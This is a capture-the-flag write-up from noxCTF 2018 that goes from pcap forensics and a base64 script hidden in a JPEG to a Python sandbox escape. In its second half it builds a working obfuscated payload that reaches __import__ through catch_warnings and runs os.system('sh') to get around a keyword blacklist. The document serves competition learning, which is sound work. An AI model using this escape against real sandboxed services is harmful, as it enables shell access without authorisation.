CTFtime.org / noxCTF 2018 / Smooth snake / Writeup

# noxCTF 2018 : Smooth-snake

**category** : forensics

**points** : 804

**solves** : 21

## write-up

This challenges has many small challenges...

First we got a pcap

I use wireshark to open it and sort it by protocol

Look at the DNS request and HTTP request to know what they are doing

There are many unrelevant sites like youtube...

I find `flag.html` and it said `I Have The Flag, but only the snake know how to get it. Try to find the snake pic`

So I download `snake.jpg` from pcap

Use `binwalk` to check `snake.jpg` and find some base64 text at the end of jpg file

extract and decode the base64 text will get `file.py`

And guessing LEET = 1337 will get me a string `my server's port moved to p+y+t+h+o+n`

So I guess it means there is a server open at port `sum(map(ord, 'python')) == 674`

And the ip is the destination ip of the packet that get me `snake.jpg`

`nc 18.223.150.0 674` give me a python sandbox challenge...

```
._'\:
import
os
sys
open
eval
exec
compile
bytes
type
frozenset
vars
chr
locals
if
try
except
```

All of the above are forbidden words

Without `.` to call method, we can use `getattr` instead

Without `__import__`, we can use `catch_warnings` in `{}.__class__.__base__.__subclasses__()`

`{}.__class__.__base__.__subclasses__()[[i.__name__ == "catch_warnings" for i in {}.__class__.__base__.__subclasses__()].index(True)]` this will give me `catch_warnings`

`{}.__class__.__base__.__subclasses__()[[i.__name__ == "catch_warnings" for i in {}.__class__.__base__.__subclasses__()].index(True)]()._module.__builtins__["__import__"]("os").system("sh")` this will give me shell

Then we just need to change `.` to `getattr`, and `_` to `dir(0)[0][0]`

Final payload : `getattr(getattr(getattr(getattr(getattr(getattr((), dir(0)[0][0]*2+"class"+dir(0)[0][0]*2), dir(0)[0][0]*2+"base"+dir(0)[0][0]*2), dir(0)[0][0]*2+"subcl"+"asses"+dir(0)[0][0]*2)()[getattr([getattr(i, dir(0)[0][0]*2+"name"+dir(0)[0][0]*2) == "catch"+dir(0)[0][0]+"warnings" for i in getattr(getattr(getattr((), dir(0)[0][0]*2+"class"+dir(0)[0][0]*2), dir(0)[0][0]*2+"base"+dir(0)[0][0]*2), dir(0)[0][0]*2+"subcl"+"asses"+dir(0)[0][0]*2)()], "index")(True)](), dir(0)[0][0]+"module"), dir(0)[0][0]*2+"builtins"+dir(0)[0][0]*2)[dir(0)[0][0]*2+"imp"+"ort"+dir(0)[0][0]*2]("o"+"s"), "sy"+"stem")("sh")`

`noxCTF{v3n0m_pyc4p}`

# other write-ups and resources

Original writeup (https://github.com/OAlienO/CTF/tree/master/2018/noxCTF/Smooth-snake).

Smooth snake

Comments

Sign in with